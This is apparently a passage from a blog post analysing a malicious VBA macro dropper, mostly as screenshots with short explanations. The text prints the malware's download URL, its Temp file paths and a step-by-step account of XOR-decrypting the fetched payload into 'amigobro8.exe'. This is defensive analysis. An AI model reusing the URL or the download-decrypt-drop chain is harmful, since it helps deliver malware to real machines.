<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVtzklR-qo2WTMilDKMBdKJmAQX-lNIixKSkevJHO7Q-pjX47-ks9lHDOcleR1X103k9m7WVCvHqtqLk2Kf3KkP3GuzWHV1P1FzoQnCaIYuxCDnIo9XuGX2BF8lxwcEfLhcdmlha0stej/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="917" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVtzklR-qo2WTMilDKMBdKJmAQX-lNIixKSkevJHO7Q-pjX47-ks9lHDOcleR1X103k9m7WVCvHqtqLk2Kf3KkP3GuzWHV1P1FzoQnCaIYuxCDnIo9XuGX2BF8lxwcEfLhcdmlha0stej/s320/17.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi24VzNGxoLCCmcS4pczAcQa5PdGPNM3iuoJqY9Gch92qoJT-oOvkLWMPGwfpNGFzrqRGIog9t9lGqO577_Ts2oOcK5pTMH1p6dK6b3yJ3HWxJqEBqiymwG8u9nqoOEMbvfvMaQhC8AfbUF/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="73" data-original-width="409" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi24VzNGxoLCCmcS4pczAcQa5PdGPNM3iuoJqY9Gch92qoJT-oOvkLWMPGwfpNGFzrqRGIog9t9lGqO577_Ts2oOcK5pTMH1p6dK6b3yJ3HWxJqEBqiymwG8u9nqoOEMbvfvMaQhC8AfbUF/s320/18.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5FTpoDW8Okcj_BuxiKeER2mwSIXUJZg_POjHPMmWQ3W89yTZrgNkqrPjmiCB8PRivuV62yq1I3hnZPfcuoaB3NTg7LVdl1DFQ_6RF5Zusa71FHvfnUxpFzScsInCxj-A0ijnZL8RY536n/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="619" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5FTpoDW8Okcj_BuxiKeER2mwSIXUJZg_POjHPMmWQ3W89yTZrgNkqrPjmiCB8PRivuV62yq1I3hnZPfcuoaB3NTg7LVdl1DFQ_6RF5Zusa71FHvfnUxpFzScsInCxj-A0ijnZL8RY536n/s320/19.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
'ShugarMilk' is given the value of 64 above; this translates into 'e', which needs to be less than 300 in order for the program to execute and produce the desired output:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZimlPLmVdG8jl3WB-lcjBdukkd4MQfMCzuvrwWJbkKd-HSNlCeLEcEXkzfrKMRszT0Z4-Zu02JflMp2DtS41buI-zjqoNU3jcw4dAgV91QjR57-DFfU0hjFpCl4uyWRXujt32bRhhZwTx/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="653" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZimlPLmVdG8jl3WB-lcjBdukkd4MQfMCzuvrwWJbkKd-HSNlCeLEcEXkzfrKMRszT0Z4-Zu02JflMp2DtS41buI-zjqoNU3jcw4dAgV91QjR57-DFfU0hjFpCl4uyWRXujt32bRhhZwTx/s320/20.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIA6X7yVZQqD89ILo0iQpAXkgt2Bdp8nHXjXrZig5vny4Vd_0-IzxApeBoKKhst_E8IakIiB2TUTYQdItrxzKTNWggZMq2Hr3MBfYlFlVgq0HnRanEcpnZY4XrjrsNQxYmseGmZ78foK/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="935" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIA6X7yVZQqD89ILo0iQpAXkgt2Bdp8nHXjXrZig5vny4Vd_0-IzxApeBoKKhst_E8IakIiB2TUTYQdItrxzKTNWggZMq2Hr3MBfYlFlVgq0HnRanEcpnZY4XrjrsNQxYmseGmZ78foK/s320/30.png" width="320" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->BladeRunner_4
: "<a href="http://fondazioneprogenies.com/38rh76f">http://fondazioneprogenies.com/38rh76f</a>"
: String : Module1.ShugarMilk<!--EndFragment--><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdRRUlxK-EPTJkwHX9DES9BYpH95CA6E3he8AReNsOJPjaU0mVn6_-bIH15FIna9MBt0JgJYLX2RawHNaaJ_x2WgeJlzHasRTC4eQN3v83OTyPzxKb4-PPXm4DyYdDdMEVpO4lSKnzaJd5/s1600/58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="98" data-original-width="1600" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdRRUlxK-EPTJkwHX9DES9BYpH95CA6E3he8AReNsOJPjaU0mVn6_-bIH15FIna9MBt0JgJYLX2RawHNaaJ_x2WgeJlzHasRTC4eQN3v83OTyPzxKb4-PPXm4DyYdDdMEVpO4lSKnzaJd5/s640/58.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYyjjmF0PZRhX4f_ljdTxZv1asMOoqPtZKKFw4UE0h37w2Z1ZgL6imTtwWF4nRnmSihAaiJ6nHgIR5NP4iOeizsd_e8GLld7DhWrBfEpW_506lU5TeX_ehCjDNK5wHGlllrH3vJ0cWIhdp/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="297" data-original-width="921" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYyjjmF0PZRhX4f_ljdTxZv1asMOoqPtZKKFw4UE0h37w2Z1ZgL6imTtwWF4nRnmSihAaiJ6nHgIR5NP4iOeizsd_e8GLld7DhWrBfEpW_506lU5TeX_ehCjDNK5wHGlllrH3vJ0cWIhdp/s320/31.png" width="320" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4ZG3v-3yjrLgYhiSNkLKauNOKO2lNCprF6dKf3lKb6H2VD01XJQu1ysvMpRfAtsKZg39mu3kxucJTYZLv0gI57c7CXPJsHPyfQ3CEMOiqSjbsGtYso18mAfxSaT2NRdyYN-Ge6m_pKKH/s1600/32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="487" data-original-width="1199" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4ZG3v-3yjrLgYhiSNkLKauNOKO2lNCprF6dKf3lKb6H2VD01XJQu1ysvMpRfAtsKZg39mu3kxucJTYZLv0gI57c7CXPJsHPyfQ3CEMOiqSjbsGtYso18mAfxSaT2NRdyYN-Ge6m_pKKH/s320/32.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJhTV6cvGVlL62Ul04VGfr_kBf03VVu07yHGRJx311LgNBhjGhqiDn6WVU5TW4RhYdcqkRMYSnwGJcVyBGPCRXC9O2FmJ-0ocEXG3WnKfxeueaz47WEnRLhMWZPF3J-k1sJHHOk-gDxaaj/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="103" data-original-width="483" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJhTV6cvGVlL62Ul04VGfr_kBf03VVu07yHGRJx311LgNBhjGhqiDn6WVU5TW4RhYdcqkRMYSnwGJcVyBGPCRXC9O2FmJ-0ocEXG3WnKfxeueaz47WEnRLhMWZPF3J-k1sJHHOk-gDxaaj/s320/33.png" width="320" /></a></div>
<br />
PlayCry 1 and PlayCry 2 execute different parts of the code:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56RJZLBxUR99eOrE18o6p0XnbpyZ_6WleSNmGr5A9v3Z0RTw0AiPH3vqlG8bTLLauZxGnf-gPSybXKhtNR3lCG3yd91XnO-6PrHKErXtIQ5eMPVDhpliBnHE4Y_JGykKQtJW2p2id0y4f/s1600/34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="251" data-original-width="959" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56RJZLBxUR99eOrE18o6p0XnbpyZ_6WleSNmGr5A9v3Z0RTw0AiPH3vqlG8bTLLauZxGnf-gPSybXKhtNR3lCG3yd91XnO-6PrHKErXtIQ5eMPVDhpliBnHE4Y_JGykKQtJW2p2id0y4f/s320/34.png" width="320" /></a></div>
PlayCry = 1<br />
This will execute:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5xI80zKOttrNnO48PmbjDCKCX4NODSSOoTJqG2KvPADvvMTT_P0ubo1k1eDUavSJ91D84O6A5X41pmqb5v_pClfwoCkthXJ1elnfo1DeVYIeZoXNJ2tgukSpgYCEpCMPHwKDsSYOa8po/s1600/35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="317" data-original-width="1171" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5xI80zKOttrNnO48PmbjDCKCX4NODSSOoTJqG2KvPADvvMTT_P0ubo1k1eDUavSJ91D84O6A5X41pmqb5v_pClfwoCkthXJ1elnfo1DeVYIeZoXNJ2tgukSpgYCEpCMPHwKDsSYOa8po/s320/35.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
PlayCry = 2</div>
<div class="" style="clear: both; text-align: left;">
This will take the 'Else' branch and execute a different part of the code, at lab1:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKof-zT155E4lAzhBhgcQlLdOxIwZSLpqc4Bayvgj-X0cxuyYHnhs0D46jlrG8Ze7LNDIZEGXB8DaDZZeoyBzI85BAM3EVoG2cov7s_j3ZSujNhNoNB07gRWu5-V5BBSurJ12pSkbWNEVt/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="1195" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKof-zT155E4lAzhBhgcQlLdOxIwZSLpqc4Bayvgj-X0cxuyYHnhs0D46jlrG8Ze7LNDIZEGXB8DaDZZeoyBzI85BAM3EVoG2cov7s_j3ZSujNhNoNB07gRWu5-V5BBSurJ12pSkbWNEVt/s320/36.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQmpjasFTdzdqgle_HO7AMIO2Z-1WvCYptUndeKEjpVvAM4S8ChMxRO73_wNxBpC3A-ecUiK5TDUBl9ffWscDSqZHvYI0KJiDRwXT9qaLQJRfrtBLQM0xrqRUpnpjj0CPV-iMJghfY1QX/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1217" height="47" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQmpjasFTdzdqgle_HO7AMIO2Z-1WvCYptUndeKEjpVvAM4S8ChMxRO73_wNxBpC3A-ecUiK5TDUBl9ffWscDSqZHvYI0KJiDRwXT9qaLQJRfrtBLQM0xrqRUpnpjj0CPV-iMJghfY1QX/s320/37.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIOkqE6hyiZx3GPUs1LDxiuiYUibF1brC2SY_GkaRLopRPtOmwiCeV7ld18CTDO4Uz0t3q9QiKqTxsHGsuQxbXrc2pZM7fp_FTvrtBXc6iTTroCus2-ciT3BDL-YLqxZfuJS2eqX3BTPz/s1600/38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1001" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIOkqE6hyiZx3GPUs1LDxiuiYUibF1brC2SY_GkaRLopRPtOmwiCeV7ld18CTDO4Uz0t3q9QiKqTxsHGsuQxbXrc2pZM7fp_FTvrtBXc6iTTroCus2-ciT3BDL-YLqxZfuJS2eqX3BTPz/s320/38.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh09F97sK3oq1I0mmJUJ3Sz1nL_QJiQaQx95-qhqoaL9XUmbMapKq2lqKgDuocglsrQENbc4bW505LH6udnkqSWuPwFICM3OAzhcxZiTTT2n5-VGgC1DkC6QKOD5mOpmAqt1q70AjAgWBX7/s1600/39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="313" data-original-width="409" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh09F97sK3oq1I0mmJUJ3Sz1nL_QJiQaQx95-qhqoaL9XUmbMapKq2lqKgDuocglsrQENbc4bW505LH6udnkqSWuPwFICM3OAzhcxZiTTT2n5-VGgC1DkC6QKOD5mOpmAqt1q70AjAgWBX7/s320/39.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiQdzoLv21DUacFBXQTXcyq3meOlzfd0Uh4t5CuGQirnql8-bhVLKlXIYuuC8wBkw7zK7saopbw0ptArmk_F8k5w5luyc4Wl6XV0-dNE_QWVC_eWLayoqMdxE-n65WudXmNAAZvxcuWb2s/s1600/40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="1073" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiQdzoLv21DUacFBXQTXcyq3meOlzfd0Uh4t5CuGQirnql8-bhVLKlXIYuuC8wBkw7zK7saopbw0ptArmk_F8k5w5luyc4Wl6XV0-dNE_QWVC_eWLayoqMdxE-n65WudXmNAAZvxcuWb2s/s320/40.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2Bc_g5NBKcpRBnJPxfNRmm47tLYMFK2N9DHmQOdQPkOV916w3EkzsmLfmUGspw1JKU-s1cirbh_Hc0-l5ccSooqUUpdaUDGy4aU9a284sKhlB_ur6GM3S6NS8O0cra4fkW3kfmOpXGuei/s1600/41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="555" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2Bc_g5NBKcpRBnJPxfNRmm47tLYMFK2N9DHmQOdQPkOV916w3EkzsmLfmUGspw1JKU-s1cirbh_Hc0-l5ccSooqUUpdaUDGy4aU9a284sKhlB_ur6GM3S6NS8O0cra4fkW3kfmOpXGuei/s320/41.png" width="320" /></a></div>
'sinus' is where all the downloaded data is processed:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0RdUZLNNE3qqLS0LYYFDc3bLWkz5ZHM9gMG8XOVHyAWl3q0SkTD2vRI9qyZ3APBMgKGlygMxOF5JjPPJq2tXlQ7NbqzscUgxRV4TZde1YrS8jgA9NJsiGSLp5eWy8bfk1RMmtxxR-vAWB/s1600/42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="345" data-original-width="983" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0RdUZLNNE3qqLS0LYYFDc3bLWkz5ZHM9gMG8XOVHyAWl3q0SkTD2vRI9qyZ3APBMgKGlygMxOF5JjPPJq2tXlQ7NbqzscUgxRV4TZde1YrS8jgA9NJsiGSLp5eWy8bfk1RMmtxxR-vAWB/s320/42.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzdoyuz1EkbPpu4tBphtTC70y4_k2IyIRnrXkydjzeBlWIkWmrp2IVLaolHeSbHswSTVv7iRnLBehWoxvUWT0KY7DdRgYdxnV47ln506GHKd2yNdWmzydnk-OgmY5M9u4k704eVYMCVdZ/s1600/43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="779" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzdoyuz1EkbPpu4tBphtTC70y4_k2IyIRnrXkydjzeBlWIkWmrp2IVLaolHeSbHswSTVv7iRnLBehWoxvUWT0KY7DdRgYdxnV47ln506GHKd2yNdWmzydnk-OgmY5M9u4k704eVYMCVdZ/s320/43.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTAHSMf-b94CP9vEb4pV1ftG-BLMIoAqwqMmUy22tbHv-3zshjXeSFqNe_7vlh2lRvD6aLsLk7heB1qZI9xUcHVRwU7jPRUbzlJPp2v3nDugnpaT9jK1Bn0Ny6GrPcBS6lIxcah-OH0Bu/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="141" data-original-width="1199" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTAHSMf-b94CP9vEb4pV1ftG-BLMIoAqwqMmUy22tbHv-3zshjXeSFqNe_7vlh2lRvD6aLsLk7heB1qZI9xUcHVRwU7jPRUbzlJPp2v3nDugnpaT9jK1Bn0Ny6GrPcBS6lIxcah-OH0Bu/s320/44.png" width="320" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_FLAME :
"C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_PathTo2 :
"C:\Users\RAGNAR~1\AppData\Local\Temp\<span style="background: lime; mso-highlight: lime;">hromberght8</span>" : String : Module1.mapRender</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIryfI9FSJPvugmz2iAcCBHFCc4PhIvW0L4ha4QBkKUeaOkDBM7iTfyE93aSlbdRM5mRYLrf5ErBurlCDjjzST673P-o9w8P224YNVJY2jSDfSwpVC3sWEc9gm7_VAotFLbyhey17BNEK/s1600/45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="461" data-original-width="1075" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIryfI9FSJPvugmz2iAcCBHFCc4PhIvW0L4ha4QBkKUeaOkDBM7iTfyE93aSlbdRM5mRYLrf5ErBurlCDjjzST673P-o9w8P224YNVJY2jSDfSwpVC3sWEc9gm7_VAotFLbyhey17BNEK/s400/45.png" width="400" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
More processing:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGgdF2LOsuv4x2KwfeYbNactxObmiI9sf5FeVM0j8pXuA0WjH8-M8Nyt9fz6mvWtwTNTL3sP-_rzjsxqM5hz5uBYCKk1WIPGNgu38SDTZMjlNCRsMjkfbJObslRmbmwrYwDQMK7sF4NZu/s1600/46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="161" data-original-width="1447" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGgdF2LOsuv4x2KwfeYbNactxObmiI9sf5FeVM0j8pXuA0WjH8-M8Nyt9fz6mvWtwTNTL3sP-_rzjsxqM5hz5uBYCKk1WIPGNgu38SDTZMjlNCRsMjkfbJObslRmbmwrYwDQMK7sF4NZu/s400/46.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->BladeRunner_Project
: "C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module1.mapRender<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The file is being loaded:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLaoXxrTEC3X7s0ijDn6XpCXB-n4QSl_KSvjLBp17HpgWSmP51bPpwys-R8E8r1k6bONysTXMOWCOfzTc6HAJW7E8ifWRG40UHipXxiwMWMNZR_V86vHoEnPy6xOPXDv4yWDkn7z9Mt7c/s1600/57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1063" data-original-width="761" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLaoXxrTEC3X7s0ijDn6XpCXB-n4QSl_KSvjLBp17HpgWSmP51bPpwys-R8E8r1k6bONysTXMOWCOfzTc6HAJW7E8ifWRG40UHipXxiwMWMNZR_V86vHoEnPy6xOPXDv4yWDkn7z9Mt7c/s400/57.png" width="286" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzwxpPT5uWDhinxFSCzwm5HHJtPQ7yU0IzGwaxks5ZG4NvhLUKcTvMbvbQ4jvrMuByQ897gkZ8xnum012IOc3-LFrL-A6t852fF9GQJ0Wny4J10HRbWCiwuLt6gHbqAq9mrMvTEZOfDBrk/s1600/47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="353" data-original-width="1209" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzwxpPT5uWDhinxFSCzwm5HHJtPQ7yU0IzGwaxks5ZG4NvhLUKcTvMbvbQ4jvrMuByQ897gkZ8xnum012IOc3-LFrL-A6t852fF9GQJ0Wny4J10HRbWCiwuLt6gHbqAq9mrMvTEZOfDBrk/s400/47.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq-myTMjjKSzOD5mFTz0tgKkc3WDyJYakbaCeKaUhpTJCVTlC-lhMBeIsdT-zEaPB18BvJLtZog8-m9qGuIG7mhmtlZpKro1JVe0P78wwSPYgxPj4DsqcxQ4DZshyKXbbpP6ui0vzfgJR/s1600/48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="785" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq-myTMjjKSzOD5mFTz0tgKkc3WDyJYakbaCeKaUhpTJCVTlC-lhMBeIsdT-zEaPB18BvJLtZog8-m9qGuIG7mhmtlZpKro1JVe0P78wwSPYgxPj4DsqcxQ4DZshyKXbbpP6ui0vzfgJR/s400/48.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzBM7uVb8veik823OJ8QBbeGeQtxA17HuqOgjL8_px1Rl172uh3zAswDED95vELDIi0_iLM1hdDsmVxIwRZy0XfE1qGyphOzPkI_cv0sEE0ghrs-c3vJC6YcgUatxXyHXmn49xWuE-6L45/s1600/49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="205" data-original-width="621" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzBM7uVb8veik823OJ8QBbeGeQtxA17HuqOgjL8_px1Rl172uh3zAswDED95vELDIi0_iLM1hdDsmVxIwRZy0XfE1qGyphOzPkI_cv0sEE0ghrs-c3vJC6YcgUatxXyHXmn49xWuE-6L45/s320/49.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4LG_1Ctsj-AR8T0BZ3U2T4n4QIozW9ikz0qBhQrxBXON4usl0NvRKc8XY81veyi__7eGuDebgaRC6PJyVGSV5-zbJggDgBHWH_mC-8vhelnPzEglhwTDLJOjHiS-MG0QSRT_4db_Z5CpE/s1600/50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="471" data-original-width="713" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4LG_1Ctsj-AR8T0BZ3U2T4n4QIozW9ikz0qBhQrxBXON4usl0NvRKc8XY81veyi__7eGuDebgaRC6PJyVGSV5-zbJggDgBHWH_mC-8vhelnPzEglhwTDLJOjHiS-MG0QSRT_4db_Z5CpE/s320/50.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWdlmutc1tv5XZf8udUBalixMUjHhWqf6Ds2TirUEyDY_tEK9PpK8l037P5jp3Bvu7eHhiF-1RtIKOqyZHttVKdvAhY7q7hoEAy8S2ltTFlti1L8kM_UPniPTtUVJKU7nqhxGNsJubliL/s1600/51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="567" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWdlmutc1tv5XZf8udUBalixMUjHhWqf6Ds2TirUEyDY_tEK9PpK8l037P5jp3Bvu7eHhiF-1RtIKOqyZHttVKdvAhY7q7hoEAy8S2ltTFlti1L8kM_UPniPTtUVJKU7nqhxGNsJubliL/s320/51.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
And now the data will be <b>decrypted</b>, using the running XOR key as shown below:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DiuezmAoItsiJxjutvRS5LhrzJ8P06_D85fj-LKEPxJjdUHwVyDF_ZR4rcZZygt3ZCIr6_T1UYW_C7e3yT8b1rYsiBWHXog7Ub2OiczeQ22965IEO_J7noWds5P3C3OIn23o6JRLkDX3/s1600/52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="1477" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DiuezmAoItsiJxjutvRS5LhrzJ8P06_D85fj-LKEPxJjdUHwVyDF_ZR4rcZZygt3ZCIr6_T1UYW_C7e3yT8b1rYsiBWHXog7Ub2OiczeQ22965IEO_J7noWds5P3C3OIn23o6JRLkDX3/s640/52.png" width="640" /></a></div>
<div class="" style="clear: both; text-align: left;">
These are the events that are executed from here on:</div>
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
<br />
<ul style="text-align: left;">
<li><span style="font-size: 11pt;">Function WidthA will be called</span></li>
<li><span style="font-size: 11pt;">Dbbb is the file loaded as the encrypted payload (</span><b style="font-size: 11pt;">hromberght8</b><span style="font-size: 11pt;">)</span></li>
<li><span style="font-size: 11pt;">Dbbb is opened as bbb, for binary operations</span></li>
<li><span style="font-size: 11pt;">Gbbb will be ReDim - reading the bbb file from 0 To LOF (complete file) </span></li>
<li><span style="font-size: 11pt;">bbb will be saved as Gbbb</span></li>
<li><span style="font-size: 11pt;">PuWord function will now be called, which will have the Gbbb() and decryption key</span></li>
<li><span style="font-size: 11pt;">bbb will be PUT in Gbbb() for decryption and function WidthA will be called at this point</span></li>
<li><span style="font-size: 11pt;">bbb will now be GET from Gbbb() - this is the decrypted version - as be</span></li>
<li><span style="font-size: 11pt;">WidthA will process the file bbbJ (write it to disk as </span><b style="font-size: 11pt;">amigobro8.exe</b><span style="font-size: 11pt;">)</span></li>
<li><span style="font-size: 11pt;">This new file is the decrypted payload - ready to execute.</span></li>
</ul>
</div>
<div class="separator" style="clear: both; text-align: left;">
